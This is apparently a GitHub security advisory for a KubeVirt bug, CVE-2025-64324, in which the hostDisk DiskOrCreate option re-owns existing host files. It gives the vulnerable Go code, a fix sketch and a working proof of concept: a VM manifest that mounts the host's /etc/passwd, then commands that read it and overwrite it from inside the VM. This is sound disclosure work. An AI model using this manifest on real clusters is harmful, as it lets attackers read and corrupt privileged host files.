GHSA-46XP-26XH-HPQH
Vulnerability from GitHub – Published: 2025-11-07 18:46 – Updated: 2025-11-27 08:53

Summary
The hostDisk feature in KubeVirt allows mounting a host file or directory owned by the user with UID 107 into a VM. However, the implementation of this feature, and more specifically the DiskOrCreate option, which creates the file if it does not exist, has a logic bug that allows an attacker to read and write arbitrary files owned by more privileged users on the host system.
Details
The hostDisk feature gate in KubeVirt allows mounting a QEMU RAW image directly from the host into a VM. While similar features, such as mounting disk images from a PVC, enforce ownership-based restrictions (e.g., only allowing files owned by a specific UID), this mechanism can be subverted. For a RAW disk image to be readable by the QEMU process running within the virt-launcher pod, it must be owned by the user with UID 107. If this ownership check is considered a security barrier, it can be bypassed. In addition, the ownership of host files mounted via this feature is changed to the user with UID 107.
This is due to a logic bug in the virt-handler component, which prepares the volumes (and the data inside them) that are mounted into the virt-launcher pod and subsequently consumed by the VM, and sets their permissions. The bug is triggered when one tries to mount a host file or directory using the DiskOrCreate option. The relevant code is as follows:
```go
// pkg/host-disk/host-disk.go

func (hdc DiskImgCreator) Create(vmi *v1.VirtualMachineInstance) error {
    for _, volume := range vmi.Spec.Volumes {
        if hostDisk := volume.VolumeSource.HostDisk; shouldMountHostDisk(hostDisk) {
            if err := hdc.mountHostDiskAndSetOwnership(vmi, volume.Name, hostDisk); err != nil {
                return err
            }
        }
    }
    return nil
}

func shouldMountHostDisk(hostDisk *v1.HostDisk) bool {
    return hostDisk != nil && hostDisk.Type == v1.HostDiskExistsOrCreate && hostDisk.Path != ""
}

func (hdc *DiskImgCreator) mountHostDiskAndSetOwnership(vmi *v1.VirtualMachineInstance, volumeName string, hostDisk *v1.HostDisk) error {
    diskPath := GetMountedHostDiskPathFromHandler(unsafepath.UnsafeAbsolute(hdc.mountRoot.Raw()), volumeName, hostDisk.Path)
    diskDir := GetMountedHostDiskDirFromHandler(unsafepath.UnsafeAbsolute(hdc.mountRoot.Raw()), volumeName)
    fileExists, err := ephemeraldiskutils.FileExists(diskPath)
    if err != nil {
        return err
    }
    if !fileExists {
        if err := hdc.handleRequestedSizeAndCreateSparseRaw(vmi, diskDir, diskPath, hostDisk); err != nil {
            return err
        }
    }
    // Change file ownership to the qemu user.
    if err := ephemeraldiskutils.DefaultOwnershipManager.UnsafeSetFileOwnership(diskPath); err != nil {
        log.Log.Reason(err).Errorf("Couldn't set Ownership on %s: %v", diskPath, err)
        return err
    }
    return nil
}
```
The root cause lies in the fact that if the file specified by the user does not exist, it is created by the handleRequestedSizeAndCreateSparseRaw function, which does not itself set file ownership or permissions. To compensate, mountHostDiskAndSetOwnership then unconditionally executes the branch marked // Change file ownership to the qemu user. This logic fails to account for the scenario where the file already exists on the host and may be owned by a more privileged user: a pre-existing file is re-owned to the qemu user all the same.
In such cases, changing file ownership without validating the file's origin introduces a security risk: it can unintentionally grant access to sensitive host files, compromising their integrity and confidentiality. This may also enable an External API Attacker to disrupt system availability.
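One way to close this gap is to confine the ownership change to files that virt-handler itself has just created, leaving pre-existing host files untouched. The following is a minimal, self-contained sketch of that idea; it is not KubeVirt's actual code or its upstream fix, and prepareHostDisk, the 0o640 mode, and the constants are illustrative assumptions:

```go
package main

import (
	"fmt"
	"os"
)

// UID/GID of the qemu user inside virt-launcher (107 in upstream KubeVirt images).
const (
	qemuUID = 107
	qemuGID = 107
)

// prepareHostDisk creates a sparse RAW image only if the path is missing,
// and changes ownership to the qemu user only in that case, so a
// pre-existing host file is never silently re-owned.
func prepareHostDisk(diskPath string, size int64) error {
	if _, err := os.Stat(diskPath); err == nil {
		// The file already exists on the host: leave its ownership alone.
		// QEMU will fail to open it unless it is already accessible to
		// UID 107, which is the intended barrier.
		return nil
	} else if !os.IsNotExist(err) {
		return err
	}

	f, err := os.OpenFile(diskPath, os.O_CREATE|os.O_EXCL|os.O_WRONLY, 0o640)
	if err != nil {
		return err
	}
	if err := f.Truncate(size); err != nil { // allocate a sparse RAW image
		f.Close()
		return err
	}
	if err := f.Close(); err != nil {
		return err
	}
	// The ownership change is confined to the file created above.
	return os.Chown(diskPath, qemuUID, qemuGID)
}

func main() {
	if err := prepareHostDisk("/tmp/host-disk.img", 1<<30); err != nil {
		fmt.Fprintln(os.Stderr, err)
		os.Exit(1)
	}
}
```

Run as a regular user, the final chown typically fails because changing ownership to another UID requires CAP_CHOWN; virt-handler holds that privilege on the node, which is precisely what makes the unconditional ownership change dangerous.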
PoC
To demonstrate this vulnerability, the HostDisk feature gate must be enabled when deploying the KubeVirt stack:
```yaml
# kubevirt-cr.yaml
apiVersion: kubevirt.io/v1
kind: KubeVirt
metadata:
  name: kubevirt
  namespace: kubevirt
spec:
  certificateRotateStrategy: {}
  configuration:
    developerConfiguration:
      featureGates:
        - HostDisk
  customizeComponents: {}
  imagePullPolicy: IfNotPresent
  workloadUpdateStrategy: {}
```
Initially, if one tries to create a VM and mount /etc/passwd from the host using the Disk option, which assumes that the file already exists, the following error is returned:
```yaml
# arbitrary-host-read-write.yaml
apiVersion: kubevirt.io/v1
kind: VirtualMachine
metadata:
  name: arbitrary-host-read-write
spec:
  runStrategy: Always
  template:
    metadata:
      labels:
        kubevirt.io/size: small
        kubevirt.io/domain: arbitrary-host-read-write
    spec:
      domain:
        devices:
          disks:
            - name: containerdisk
              disk:
                bus: virtio
            - name: cloudinitdisk
              disk:
                bus: virtio
            - name: host-disk
              disk:
                bus: virtio
          interfaces:
            - name: default
              masquerade: {}
        resources:
          requests:
            memory: 64M
      networks:
        - name: default
          pod: {}
      volumes:
        - name: containerdisk
          containerDisk:
            image: quay.io/kubevirt/cirros-container-disk-demo
        - name: cloudinitdisk
          cloudInitNoCloud:
            userDataBase64: SGkuXG4=
        - name: host-disk
          hostDisk:
            path: /etc/passwd
            type: Disk
```
```bash
# Deploy the above VM manifest
operator@minikube:~$ kubectl apply -f arbitrary-host-read-write.yaml
# Observe the deployment status
operator@minikube:~$ kubectl get vm
NAME                        AGE     STATUS             READY
arbitrary-host-read-write   7m55s   CrashLoopBackOff   False
# Inspect the reason for the `CrashLoopBackOff`
operator@minikube:~$ kubectl get vm arbitrary-host-read-write -o jsonpath='{.status.conditions[3].message}'
server error. command SyncVMI failed: "LibvirtError(Code=1, Domain=10, Message='internal error: process exited while connecting to monitor: 2025-05-20T20:14:01.546609Z qemu-kvm: -blockdev {\"driver\":\"file\",\"filename\":\"/var/run/kubevirt-private/vmi-disks/host-disk/passwd\",\"aio\":\"native\",\"node-name\":\"libvirt-1-storage\",\"read-only\":false,\"discard\":\"unmap\",\"cache\":{\"direct\":true,\"no-flush\":false}}: Could not open '/var/run/kubevirt-private/vmi-disks/host-disk/passwd': Permission denied')"
```
The host's /etc/passwd file is owned by 0:0 (root:root); hence, when the above VirtualMachine definition is deployed, QEMU gets a Permission denied error because the file is not owned by the user with UID 107 (qemu). A standalone check of this ownership condition is sketched after the following listing:
```bash
# Inspect the ownership of the host's mounted `/etc/passwd` file within the `virt-launcher` pod responsible for the VM
operator@minikube:~$ kubectl exec -it virt-launcher-arbitrary-host-read-write-tjjkt -- ls -al /var/run/kubevirt-private/vmi-disks/host-disk/passwd
-rw-r--r--. 1 root root 1276 Jan 13 17:10 /var/run/kubevirt-private/vmi-disks/host-disk/passwd
```
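For reference, the condition that QEMU's open effectively enforces here can be reproduced outside KubeVirt with a few lines of Go. This is an illustrative, Linux-only helper and not part of KubeVirt; the ownedByQemu name and the hard-coded path are assumptions for the example:

```go
package main

import (
	"fmt"
	"os"
	"syscall"
)

// qemuUID is the UID of the qemu user inside the virt-launcher pod.
const qemuUID = 107

// ownedByQemu reports whether path is owned by UID 107, i.e. whether the
// QEMU process in virt-launcher would be allowed to open the RAW image
// for writing given the 0644 permissions shown above.
func ownedByQemu(path string) (bool, error) {
	fi, err := os.Stat(path)
	if err != nil {
		return false, err
	}
	st, ok := fi.Sys().(*syscall.Stat_t) // Linux-only
	if !ok {
		return false, fmt.Errorf("no raw stat data for %s", path)
	}
	return st.Uid == qemuUID, nil
}

func main() {
	// Path of the host disk as seen from inside the virt-launcher pod.
	path := "/var/run/kubevirt-private/vmi-disks/host-disk/passwd"
	ok, err := ownedByQemu(path)
	if err != nil {
		fmt.Fprintln(os.Stderr, err)
		os.Exit(1)
	}
	fmt.Printf("%s owned by qemu (UID %d): %v\n", path, qemuUID, ok)
}
```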
However, if one uses the DiskOrCreate option, the file's ownership is silently changed to 107:107 (qemu:qemu) before the VM is started, which allows the VM to boot and then read and modify the file; the effect of that ownership change on the host path is sketched right after the snippet below.
```yaml
...
          hostDisk:
            capacity: 1Gi
            path: /etc/passwd
            type: DiskOrCreate
```
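To make the effect of that unconditional ownership change concrete, the following standalone sketch re-owns a scratch file to 107:107, roughly what virt-handler's UnsafeSetFileOwnership call does to the mounted host path. It is an illustration only, to be run against a throwaway file, never a real system file; the path and the printOwner helper are assumptions:

```go
package main

import (
	"fmt"
	"os"
	"syscall"
)

// printOwner prints the numeric owner and group of path.
func printOwner(path string) {
	fi, err := os.Stat(path)
	if err != nil {
		fmt.Fprintln(os.Stderr, err)
		return
	}
	st := fi.Sys().(*syscall.Stat_t) // Linux-only
	fmt.Printf("%s is owned by %d:%d\n", path, st.Uid, st.Gid)
}

func main() {
	// Scratch file standing in for a sensitive host file such as /etc/passwd.
	const path = "/tmp/demo-passwd"
	if err := os.WriteFile(path, []byte("root:x:0:0:root:/root:/bin/bash\n"), 0o644); err != nil {
		fmt.Fprintln(os.Stderr, err)
		os.Exit(1)
	}
	printOwner(path) // owned by the invoking user before the change

	// The vulnerable code path performs this chown whether or not the file
	// pre-existed; applied to a root-owned host file, it hands the contents
	// to the VM's qemu process. Requires CAP_CHOWN (run as root) to succeed.
	if err := os.Chown(path, 107, 107); err != nil {
		fmt.Fprintln(os.Stderr, "chown:", err)
		os.Exit(1)
	}
	printOwner(path) // now 107:107, readable and writable by QEMU
}
```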
```bash
# Apply the modified manifest
operator@minikube:~$ kubectl apply -f arbitrary-host-read-write.yaml
# Observe the deployment status
operator@minikube:~$ kubectl get vm
NAME                        AGE     STATUS    READY
arbitrary-host-read-write   7m55s   Running   False
# Initiate a console connection to the running VM
operator@minikube:~$ virtctl console arbitrary-host-read-write
...
```
```bash
# Within the VM arbitrary-host-read-write, inspect the present block devices and their contents
root@arbitrary-host-read-write:~$ lsblk
NAME    MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT
vda     253:0    0   44M  0 disk
|-vda1  253:1    0   35M  0 part /
`-vda15 253:15   0    8M  0 part
vdb     253:16   0    1M  0 disk
vdc     253:32   0  1.5K  0 disk
root@arbitrary-host-read-write:~$ cat /dev/vdc
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
_rpc:x:101:65534::/run/rpcbind:/usr/sbin/nologin
systemd-network:x:102:106:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:107:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
statd:x:104:65534::/var/lib/nfs:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
docker:x:1000:999:,,,:/home/docker:/bin/bash
# Write into the block device backed by the host's `/etc/passwd` file
root@arbitrary-host-read-write:~$ echo "Quarkslab" | tee -a /dev/vdc
```
If one then inspects the host's /etc/passwd file, its contents have changed, and so has its ownership:
```bash
# Inspect the contents of the file
operator@minikube:~$ cat /etc/passwd
Quarkslab
:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
_rpc:x:101:65534::/run/rpcbind:/usr/sbin/nologin
systemd-network:x:102:106:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:107:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
statd:x:104:65534::/var/lib/nfs:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
docker:x:1000:999:,,,:/home/docker:/bin/bash
# Inspect the permissions of the file
operator@minikube:~$ ls -al /etc/passwd
-rw-r--r--. 1 107 systemd-resolve 1276 May 20 20:35 /etc/passwd
# Test the integrity of the system
operator@minikube:~$ sudo su
sudo: unknown user root
sudo: error initializing audit plugin sudoers_audit
```
Impact
Arbitrary read and write of host files: this vulnerability can unintentionally grant access to sensitive host files, compromising their integrity and confidentiality.
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "kubevirt.io/kubevirt"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.6.1"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Go",
"name": "kubevirt.io/kubevirt"
},
"ranges": [
{
"events": [
{
"introduced": "1.7.0-alpha.0"
},
{
"fixed": "1.7.0-rc.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-64324"
],
"database_specific": {
"cwe_ids": [
"CWE-123",
"CWE-200",
"CWE-732"
],
"github_reviewed": true,
"github_reviewed_at": "2025-11-07T18:46:09Z",
"nvd_published_at": "2025-11-18T23:15:55Z",
"severity": "HIGH"
},
"details": "### Summary\nThe `hostDisk` feature in KubeVirt allows mounting a host file or directory owned by the user with UID 107 into a VM. However, the implementation of this feature and more specifically the `DiskOrCreate` option which creates a file if it doesn\u0027t exist, has a logic bug that allows an attacker to read and write arbitrary files owned by more privileged users on the host system.\n\n\n### Details\nThe `hostDisk` feature gate in KubeVirt allows mounting a QEMU RAW image directly from the host into a VM. While similar features, such as mounting disk images from a PVC, enforce ownership-based restrictions (e.g., only allowing files owned by specific UID, this mechanism can be subverted. For a RAW disk image to be readable by the QEMU process running within the `virt-launcher` pod, it must be owned by a user with UID 107. **If this ownership check is considered a security barrier, it can be bypassed**. In addition, the ownership of the host files mounted via this feature is changed to the user with UID 107. \n\nThe above is due to a logic bug in the code of the `virt-handler` component which prepares and sets the permissions of the volumes and data inside which are going to be mounted in the `virt-launcher` pod and consecutively consumed by the VM. It is triggered when one tries to mount a host file or directory using the `DiskOrCreate` option. The relevant code is as follows:\n\n```go\n// pkg/host-disk/host-disk.go\n\nfunc (hdc DiskImgCreator) Create(vmi *v1.VirtualMachineInstance) error {\n\tfor _, volume := range vmi.Spec.Volumes {\n\t\tif hostDisk := volume.VolumeSource.HostDisk; shouldMountHostDisk(hostDisk) {\n\t\t\tif err := hdc.mountHostDiskAndSetOwnership(vmi, volume.Name, hostDisk); err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t}\n\t}\n\treturn nil\n}\n\nfunc shouldMountHostDisk(hostDisk *v1.HostDisk) bool {\n\treturn hostDisk != nil \u0026\u0026 hostDisk.Type == v1.HostDiskExistsOrCreate \u0026\u0026 hostDisk.Path != \"\"\n}\n\nfunc (hdc *DiskImgCreator) mountHostDiskAndSetOwnership(vmi *v1.VirtualMachineInstance, volumeName string, hostDisk *v1.HostDisk) error {\n\tdiskPath := GetMountedHostDiskPathFromHandler(unsafepath.UnsafeAbsolute(hdc.mountRoot.Raw()), volumeName, hostDisk.Path)\n\tdiskDir := GetMountedHostDiskDirFromHandler(unsafepath.UnsafeAbsolute(hdc.mountRoot.Raw()), volumeName)\n\tfileExists, err := ephemeraldiskutils.FileExists(diskPath)\n\tif err != nil {\n\t\treturn err\n\t}\n\tif !fileExists {\n\t\tif err := hdc.handleRequestedSizeAndCreateSparseRaw(vmi, diskDir, diskPath, hostDisk); err != nil {\n\t\t\treturn err\n\t\t}\n\t}\n\t// Change file ownership to the qemu user.\n\tif err := ephemeraldiskutils.DefaultOwnershipManager.UnsafeSetFileOwnership(diskPath); err != nil {\n\t\tlog.Log.Reason(err).Errorf(\"Couldn\u0027t set Ownership on %s: %v\", diskPath, err)\n\t\treturn err\n\t}\n\treturn nil\n}\n```\n\n\nThe root cause lies in the fact that if the specified by the user file does not exist, it is created by the `handleRequestedSizeAndCreateSparseRaw` function. However, this function does not explicitly set file ownership or permissions. As a result, the logic in `mountHostDiskAndSetOwnership` proceeds to the branch marked with `// Change file ownership to the qemu user`, assuming ownership should be applied. This logic fails to account for the scenario where the file already exists and may be owned by a more privileged user. 
\nIn such cases, changing file ownership without validating the file\u0027s origin introduces a security risk: it can unintentionally grant access to sensitive host files, compromising their integrity and confidentiality. This may also enable an **External API Attacker** to disrupt system availability.\n\n\n### PoC\nTo demonstrate this vulnerability, the `hostDisk` feature gate should be enabled when deploying the KubeVirt stack. \n\n```yaml\n# kubevirt-cr.yaml\napiVersion: kubevirt.io/v1\nkind: KubeVirt\nmetadata:\n name: kubevirt\n namespace: kubevirt\nspec:\n certificateRotateStrategy: {}\n configuration:\n developerConfiguration:\n featureGates:\n - HostDisk\n customizeComponents: {}\n imagePullPolicy: IfNotPresent\n workloadUpdateStrategy: {}\n```\n\n\nInitially, if one tries to create a VM and mount `/etc/passwd` from the host using the `Disk` option which assumes that the file already exists, the following error is returned:\n\n```yaml\n# arbitrary-host-read-write.yaml\napiVersion: kubevirt.io/v1\nkind: VirtualMachine\nmetadata:\n name: arbitrary-host-read-write\nspec:\n runStrategy: Always\n template:\n metadata:\n labels:\n kubevirt.io/size: small\n kubevirt.io/domain: arbitrary-host-read-write\n spec:\n domain:\n devices:\n disks:\n - name: containerdisk\n disk:\n bus: virtio\n - name: cloudinitdisk\n disk:\n bus: virtio\n - name: host-disk\n disk:\n bus: virtio\n interfaces:\n - name: default\n masquerade: {}\n resources:\n requests:\n memory: 64M\n networks:\n - name: default\n pod: {}\n volumes:\n - name: containerdisk\n containerDisk:\n image: quay.io/kubevirt/cirros-container-disk-demo\n - name: cloudinitdisk\n cloudInitNoCloud:\n userDataBase64: SGkuXG4=\n - name: host-disk\n hostDisk:\n path: /etc/passwd\n type: Disk\n```\n\n\n```bash\n# Deploy the above VM manifest\noperator@minikube:~$ kubectl apply -f arbitrary-host-read-write.yaml\n# Observe the deployment status\noperator@minikube:~$ kubectl get vm\nNAME AGE STATUS READY\narbitrary-host-read-write 7m55s CrashLoopBackOff False\n# Inspect the reason for the `CrashLoopBackOff`\noperator@minikube:~$ kubectl get vm arbitrary-host-read-write -o jsonpath=\u0027{.status.conditions[3].message}\u0027\nserver error. command SyncVMI failed: \"LibvirtError(Code=1, Domain=10, Message=\u0027internal error: process exited while connecting to monitor: 2025-05-20T20:14:01.546609Z qemu-kvm: -blockdev {\\\"driver\\\":\\\"file\\\",\\\"filename\\\":\\\"/var/run/kubevirt-private/vmi-disks/host-disk/passwd\\\",\\\"aio\\\":\\\"native\\\",\\\"node-name\\\":\\\"libvirt-1-storage\\\",\\\"read-only\\\":false,\\\"discard\\\":\\\"unmap\\\",\\\"cache\\\":{\\\"direct\\\":true,\\\"no-flush\\\":false}}: Could not open \u0027/var/run/kubevirt-private/vmi-disks/host-disk/passwd\u0027: Permission denied\u0027)\"\n```\n\nThe hosts\u0027s `/etc/passwd` file\u0027s owner and group are `0:0` (`root:root`) hence, when one tries to deploy the above `VirtualMachine` definition, it gets a `PermissionDenied` error because the file is not owned by the user with UID `107` (`qemu`):\n\n\n```bash\n# Inspect the ownership of the host\u0027s mounted `/etc/passwd` file within the `virt-launcher` pod responsible for the VM\noperator@minikube:~$ kubectl exec -it virt-launcher-arbitrary-host-read-write-tjjkt -- ls -al /var/run/kubevirt-private/vmi-disks/host-disk/passwd\n-rw-r--r--. 
1 root root 1276 Jan 13 17:10 /var/run/kubevirt-private/vmi-disks/host-disk/passwd\n```\n\nHowever, if one uses the `DiskOrCreate` option, the file\u0027s ownership is silently changed to `107:107` (`qemu:qemu`) before the VM is started which allows the latter to boot, and then read and modify it.\n\n```yaml\n...\nhostDisk:\n capacity: 1Gi\n path: /etc/passwd\n type: DiskOrCreate\n```\n\n```bash\n# Apply the modified manifest\noperator@minikube:~$ kubectl apply -f arbitrary-host-read-write.yaml\n# Observe the deployment status\noperator@minikube::~$ kubectl get vm\nNAME AGE STATUS READY\narbitrary-host-read-write 7m55s Running False\n# Initiate a console connection to the running VM\noperator@minikube: virtctl console arbitrary-host-read-write\n...\n```\n\n```bash\n# Within the VM arbitrary-host-read-write, inspect the present block devices and their contents\nroot@arbitrary-host-read-write:~$ lsblk\nNAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT\nvda 253:0 0 44M 0 disk\n|-vda1 253:1 0 35M 0 part /\n`-vda15 253:15 0 8M 0 part\nvdb 253:16 0 1M 0 disk\nvdc 253:32 0 1.5K 0 disk\nroot@arbitrary-host-read-write:~$ cat /dev/vdc\nroot:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\nsync:x:4:65534:sync:/bin:/bin/sync\ngames:x:5:60:games:/usr/games:/usr/sbin/nologin\nman:x:6:12:man:/var/cache/man:/usr/sbin/nologin\nlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\nmail:x:8:8:mail:/var/mail:/usr/sbin/nologin\nnews:x:9:9:news:/var/spool/news:/usr/sbin/nologin\nuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin\nproxy:x:13:13:proxy:/bin:/usr/sbin/nologin\nwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\nbackup:x:34:34:backup:/var/backups:/usr/sbin/nologin\nlist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin\nirc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin\nnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\n_apt:x:100:65534::/nonexistent:/usr/sbin/nologin\n_rpc:x:101:65534::/run/rpcbind:/usr/sbin/nologin\nsystemd-network:x:102:106:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin\nsystemd-resolve:x:103:107:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin\nstatd:x:104:65534::/var/lib/nfs:/usr/sbin/nologin\nsshd:x:105:65534::/run/sshd:/usr/sbin/nologin\ndocker:x:1000:999:,,,:/home/docker:/bin/bash\n# Write into the block device backed up by the host\u0027s `/etc/passwd` file\nroot@arbitrary-host-read-write:~$ echo \"Quarkslab\" | tee -a /dev/vdc\n```\n\nIf one inspects the file content of the host\u0027s `/etc/passwd` file, they will see that it has changed alongside its ownership:\n\n```bash\n# Inspect the contents of the file\noperator@minikube:~$ cat /etc/passwd\nQuarkslab\n:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\nsync:x:4:65534:sync:/bin:/bin/sync\ngames:x:5:60:games:/usr/games:/usr/sbin/nologin\nman:x:6:12:man:/var/cache/man:/usr/sbin/nologin\nlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\nmail:x:8:8:mail:/var/mail:/usr/sbin/nologin\nnews:x:9:9:news:/var/spool/news:/usr/sbin/nologin\nuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin\nproxy:x:13:13:proxy:/bin:/usr/sbin/nologin\nwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\nbackup:x:34:34:backup:/var/backups:/usr/sbin/nologin\nlist:x:38:38:Mailing List 
Manager:/var/list:/usr/sbin/nologin\nirc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin\nnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\n_apt:x:100:65534::/nonexistent:/usr/sbin/nologin\n_rpc:x:101:65534::/run/rpcbind:/usr/sbin/nologin\nsystemd-network:x:102:106:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin\nsystemd-resolve:x:103:107:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin\nstatd:x:104:65534::/var/lib/nfs:/usr/sbin/nologin\nsshd:x:105:65534::/run/sshd:/usr/sbin/nologin\ndocker:x:1000:999:,,,:/home/docker:/bin/bash\n# Inspect the permissions of the file\noperator@minikube:~$ ls -al /etc/passwd\n-rw-r--r--. 1 107 systemd-resolve 1276 May 20 20:35 /etc/passwd\n# Test the integrity of the system\noperator@minikube: $sudo su\nsudo: unknown user root\nsudo: error initializing audit plugin sudoers_audit\n```\n\n### Impact\n\nHost files arbitrary read and write - this vulnerability it can unintentionally grant access to sensitive host files, compromising their integrity and confidentiality.",
"id": "GHSA-46xp-26xh-hpqh",
"modified": "2025-11-27T08:53:21Z",
"published": "2025-11-07T18:46:09Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/kubevirt/kubevirt/security/advisories/GHSA-46xp-26xh-hpqh"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-64324"
},
{
"type": "WEB",
"url": "https://github.com/kubevirt/kubevirt/pull/15037"
},
{
"type": "WEB",
"url": "https://github.com/kubevirt/kubevirt/commit/00d03e43e3bf03e563136695a4732b65ed42d764"
},
{
"type": "WEB",
"url": "https://github.com/kubevirt/kubevirt/commit/ff3b69b08b6b9c8d08d23735ca8d82455f790a69"
},
{
"type": "PACKAGE",
"url": "https://github.com/kubevirt/kubevirt"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "KubeVirt Vulnerable to Arbitrary Host File Read and Write"
}